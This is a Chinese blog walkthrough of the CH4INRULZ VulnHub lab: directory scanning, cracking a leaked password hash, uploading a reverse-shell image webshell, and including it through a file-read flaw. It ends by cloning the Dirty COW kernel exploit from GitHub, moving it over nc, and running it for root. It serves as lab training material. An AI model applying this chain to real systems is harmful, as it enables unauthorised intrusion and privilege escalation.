CH4INRULZ vulnhub靶场

首先还是进行nmap的扫描

在这里插入图片描述

发现是这个网站

在这里插入图片描述

接下来用dirb扫一下,发现一个development页面,打开看一下

在这里插入图片描述

打开发现给了一个登录框,还没法登陆,再看别的地方,继续扫一下备份文件,在linux系统里面bak结尾的备份文件比较多

dirb http://192.168.111.134 -X .bak    //通过X参数设定后缀

在这里插入图片描述

扫到了bak文件,可以直接用curl读取一下,

curl http://192.168.111.134/index.html.bak

在这里插入图片描述

这里只要重点看注释里的内容,看起来是用户名密码组合,用户名frank,密码貌似是被加密的,把用户名密码用txt保存,用john解密一下

frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0:  //还要加个冒号才能破解成功,不懂
john 1.txt --show

在这里插入图片描述

用获取到的这个用户名密码登陆刚刚的development目录里面的登录框

在这里插入图片描述

猜测还有一个uploader目录

在这里插入图片描述

上传一个图片马(反向连接的)

在这里插入图片描述

上传上去了但是不知道存储的位置

扫描一下8011端口的目录

在这里插入图片描述

访问文件接口

在这里插入图片描述

说要传一个文件名给它,我们尝试传给它我们刚刚上传的图片马名

在这里插入图片描述

可以读到文件

在这里插入图片描述

能读取到文件,可以尝试读取刚刚文件上传的那个php文件,以找到我们图片马上传的路径

这个文件直接被解析了,用php伪协议读一下就可以了
在这里插入图片描述

<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>

在这个路径下

http://192.168.111.134/development/uploader/FRANKuploads/shell.gif

在刚刚的包含点包含一下,这个时候可以提前开启nc监听了

在这里插入图片描述

在这里插入图片描述

查看内核版本

在这里插入图片描述

只要内核版本大于2.4.22就可以使用脏牛提权

git clone https://github.com/FireFart/dirtycow.git
python -c 'import pty;pty.spawn("/bin/bash")'  //交互窗口

转到var路径看一下文件目录,找一个比较高的用户权限目录上传脏牛,那个a可以

在这里插入图片描述

cd a
nc -l 1212 >dcow.tar.gz
nc 192.168.111.134 1212< dcow.tar.gz
tar -xzvf dcow.tar.gz
cd CVE-2016-5195-master
make
./dcow
su
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MUNG东隅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值